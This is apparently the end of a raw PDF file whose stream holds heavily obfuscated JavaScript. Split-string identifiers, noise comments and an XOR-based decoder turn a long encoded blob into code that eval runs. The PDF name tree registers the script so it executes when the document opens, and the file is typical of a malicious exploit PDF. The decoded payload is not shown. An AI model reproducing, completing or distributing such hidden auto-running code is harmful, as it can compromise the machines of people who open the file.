{vdhLM = "CDiePf";for(eval(""    + f2jHRySV9+""  +"iae3bea="+"" +  "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+  "a"+f2jHRySV9+   "t"+f2jHRySV9+    "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+   ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d"+eHNZ4vWoLEKv8+f3ZDgztjAS+eHNZ4vWoLEKv8  +"A"+eHNZ4vWoLEKv8+"t"](pGOxnqANUDz0++)-48])<<LR7Pv3rHUFW;
// Non-zero shift: a full byte is available. 187^HgA1sml&255 parses as
// 187 ^ (HgA1sml & 255); the accumulator then drops 8 bits (5+3) and the shift
// drops by 2 (4-2). Zero shift: nothing is emitted and the shift restarts at 6 (4+2).
if(LR7Pv3rHUFW){fi1AxkC+=HXwlQiWZtFWt(187^HgA1sml/*K5dKjNlvmTde8GzXS67fmGXdl8UmbTMEY1YHOKDAnqpv8pSavZFhpmLbupNVJkkrlI00cMKQD0LKyoutNAbDxworm*/&/*O6x8wiQ7r3SCTfLo1KcuE16pD3m3tYFGdCOauogmr0yKoK0oemjtmoi1qU3k3H2gUP*/255);HgA1sml>>=5/*XEyB68AQvUZk0LT39Hk99FBsITtyxJGMXEXcLh4HBc2LyUN8m9FvNRofuher2uDY9lBU*/+3;LR7Pv3rHUFW-=4/*YlermzqHNx5VDzsenYZVCQW8e6GPGksVVWMHWCZtAdONdH3Rpbw33*/-2;
}else{LR7Pv3rHUFW=4+2;}}}

return(fi1AxkC);

}

BJeuy7.push(""+j3x97QH38BS(   /*BgZP6p0yLeUhw1uWu60ISnZVEP7BR9fapE1v40tOoO7lO*/ "" /*yJ7QcZEC5SbBe3KJd0Xd6anyzcM7Nl8e5E6hnJtsmU4QXNjBXGpcrcbrF*/ +"WHnH5QzH5yn4uZabYsgFuUkt5Vc4Sp5rWHcFYO9FxS3fuHcCoSMCvvz4ZyEtRkjbNs3fxJR4uJVnEvcCNs9bSpnH5OdtY2cXYF9FSIL6I2cXYR54AV3tGQdbBZabAV3tGQErJQLntpnH5OdtuZabAV3tGQDmGsDHG0DtxNgXSMamNs3fhbw_1JVn5s9FKyDfupnH5Odt1MLnJRuntHnH5QLF2yEtxS3fuZabZQdtYHnC2FnX5XMX5OnChNgrWp3XuKLF2yEtxS3fuqabopjbWADntHnH5QjtZRdfhV9XuZabKNcXGOcHRs9_L@zFaQG6G@zFobkOv@zFGMaOR@zFR6vOo@zFvMarjszFob06aszFp6vOR@zFobQP0szFRKwOo@zFRpw0jszFvMarjszFoPv6v@zFE60OR@zFKKarjszFgUv6aszFKU0Ov@zFPya0p@zFPyT6jszFPO0rjszFvHQ0jszFKbwO@szFPV0rG@zFopwOg@zFRPwOK@zFKtwOg@zFE6arjszFobv6aszFG6GOv@zFR6GOo@zFKHT0G@zFEHarjszFR6T6R@zFG6T0G@zFvpGPA@zFvUwOR@zFG6wP0szFGHT09szFjs069szFR6w6v@zF9yG6o@zFRKGOv@zFaXvPp@zFR6a60szFvMT0@szFPXQ0jszFGbQOo@zFE@T0o@zFK@Q0K@zFvHarjszFR6T6v@zFgHGPG@zFR60rjszFob0Oo@zFp6QOg@zF0Oa6G@zFRParjszFR6ar@szFKHvPG@zFKMwOPszFoPvPG@zFRKGO0szFKbwOE@zFG6TPo@zFoUvP@szFPvwOjszF9XQP5@zF9Xk09szFaQG65@zF9FarjszF@sk05@zFjvaO9szF5@kOK@zFEKTOK@zFgHwPjszFgHwro@zFG6wPjszFjvGPR@zFgPTOp@zFRMa6R@zFgKwOR@zFgKwOv@zFg@GO5@zF5PG6K@zFgpw6aszFKMGOv@zFK6wOv@zF@VkPo@zFRPk0aszF9XvOaszFRPwOK@zF9varjszFa0arG@zFjQa6aszFoUkOaszFAKw0R@zFgKwOR@zFg@kO9szFgPT6PszFE@TOo@zFg6vO5@zFKPTO0szFo@kPo@zFR@0OPszF9XQ0aszFRPwOK@zFKMwrG@zFaQG6G@zFKMwOR@zFobQOg@zFRPwOK@zFayarG@zFo6GO9szFv6vP5@zFKMwO5@zFGHTPo@zF5HQ6@szF9XvOR@zFRPwOK@zFKtwOjszFjvwOg@zF9sQro@zFR@0r@szFK@T09szFgU06v@zF9X06R@zFgKa0E@zFEPGOv@zFGUvOR@zF5Hk69szFgpTO0szFEbTOG@zF5@kO9szFg@TOv@zFEMTOK@zFgHkOg@zFgHvOv@zFg@T6PszF5HvOK@zFgHkOG@zFg@vOK@zFg@GOv@zF5HvO5@zFgPkOA@zF5@kOE@zFgKGOR@zFGHvOR@zFgUGOR@zFg@TOE@zFG6G60szFEMG69szFgtTOp@zFGPkOK@zFRMG6Kbz_1JVnYS9tuZabKNcXGOcHRs9_L@zFRU06@szFRU06@szFRU06@szFRU06@yz_WpsC2V9tLkgfTo9bJMLfhQdbBMjtZRdfhV9X1JVnLRgXLkgfTo9bJMzFYsgtTV9t2vLb2@d6@QwP2@d6@QwPLp5rWpsC2V9X2yEtxInXuZab5MGrWpRtRynHAQzeuKcXZ0cX5OnClsg_SscHRy9fhOgCY2cXYF9FSoTnttdCxkcXuKLHxF3HNSgHBNjf2NgXvv9eGQDtZRn_ubcCDy9fhOgCBZTHxF3HNSgHBoTntHcCNk3HNSgHBQzeubcCD
y9fhOgCY6nFLOdF5R3fDvj6NM5tRynHAR5rWpuHNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NMLHxF3HNSgHBNjf2NgXvvcmGQDtZRn_1JVnEvcCNs9_LkgfTo3mNs3fD0dCB6dt5Vc4u2abRKdORMa6RpjbLkgfTo9bJMLHNSgHBoLHNSgHBoLXxk9fLkgfTogrWpVf2u9bJMLf2Fdb@yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_uZcXqoMCbQzeub9fhOgCuAjbSscHRy9fhOgC1JVngV3tuqcFqQzeupV65pwrApwrApwrApwrApwrApwrAKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroATnt@dFxk3mRynCY0DXSbzyv@a6RMTXL2LfKuc_1JVWWJVC3Qj_gs3tGRgfYQjeuKw_WADntHnH5QzHk0gCBQzeu@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyK
Fa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntHnH5Qzf2ugjZyDtZRdbJMLf2Fdb@yDtZRd_xATntHnH5Q5HTQzeuMa4R696TQGHR6grWpuFZydbZ09X5QzeuMa4vMa6RMa61JVngV3tu6EH_kcXYQzeuU9XkogCY2cXYF9FSQL_ubGrWpuFZydbNs3fuZabZ09X5QzmuK5tTSPf2Ng_RKE6op5rWpuFZydbAV3tGQdbJMzFYsgtTV9t2vLb2@nrRpa62@nrRpa6Lp5rWpV4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntHnH5Q5HhsDfvyabJMj_TO9bqMj6o0a6RMa6Rp5mZ09X5oTn3S3tuKLFZydbTScFY0neRAGHhsDfvkGHhsDfvyGrTScFY0E_BpLn1IsbuMjbqscf_V3t5Vc4rOgfKN9FbQzeupnH5OdtuAjbZ09XBogrWZDntHnH5Q5fgs3t3kgfEQzeu@Df2OEHZQnXSbzyKQGHR6cyKQGHR63bxATnttdCxkcXSx3F2yDXNSgFY2cXYF9FSQjeuPaOA@T6xM5fgs3t3kgfEQ5_JM5fgs3t3kgfEoTntPdCxODmTS9fNV3Hw0Ef5s9bJM5Phk9fZy3mTS9fNsgHvsQfZR9ftN3Xhv54GsDH7IabLbjmqOEXlM5fgs3t3kgfEun_1JVWWJVC3Qj_gs3tGRgfYQjeupTmppznWpR4Wp3XuKzHRQDmkSgHY6vfNkcHLN5X20ndTS3fxADnuMjbuMLFZydbgXdt20dCAV9bJ@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6G
HQyKXGOgUwyKOa0g@wyKQa6G@TbxATntMLFZydbSFMtKMa6aN0bJMLFgQnXvvc4ZNjf2NgXvv9b7ML61JVnuHnH5Qjf2N9bJMj6o0a6RMa6RMzmuKjCnVnORMGPfQ5_uMa4GKw_1JVnuHnH5Qz4ZyEtRQzeu@Df2OEHZQnXSbzyKRa6AMwyKRa6AMTbxATntMz4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntMLFZydbRswP7okOKH9bJMj_RKd6TQGHR696TQzmuMa4vMa6RMa6xM5muMa4vMa6RMa61JsbuMjbuHgf5Qj_gV3tuHntTVP0AHw4uZabRAabgVEHU0QrgpdbIMjtKUkC4XwO3oabgVEHU0QrgpdbBAjbxADnuMjbuMzH5yn4rXntTVP0AHw4bQzeupnH5OdtuAjbgXdt20dCAVgrJIsbuMjbuHnH5QjFMu0Cfyg0EQzeu@Df2OEHZQnXSbzyRpTbxATnuMjbuM5FSR9f2Qj_vsM9SNkHdFDmNs3fD0dCu2abRKdORMa6xPnsHv39LFvFuAzeuPnsHv39LFvF1JsbuMjbuPnsHv39LFvFuZabLqkmLM5_uPnsHv39LFvF1JVnuU9tRNjXhO3maS9fNV3HYtcXvRvHhN9_vsM9SNkHdFn_1JVnJIVnJo"  +      ""));eval(BJeuy7);
endstream
endobj
14 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
10 0 obj
<</Names [(a) 14 0 R]
>>
endobj
15 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080726194358)
/CreationDate (D:20080726194358)
>>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000412 00000 n 
0000000204 00000 n 
0000000249 00000 n 
0000000342 00000 n 
0000000322 00000 n 
0000000373 00000 n 
0000000756 00000 n 
0000000564 00000 n 
0000004736 00000 n 
0000000430 00000 n 
0000000511 00000 n 
0000000822 00000 n 
0000004689 00000 n 
0000004777 00000 n 
trailer
<</Info 15 0 R
/Root 1 0 R
/Size 16
>>
startxref
4978
%%EOF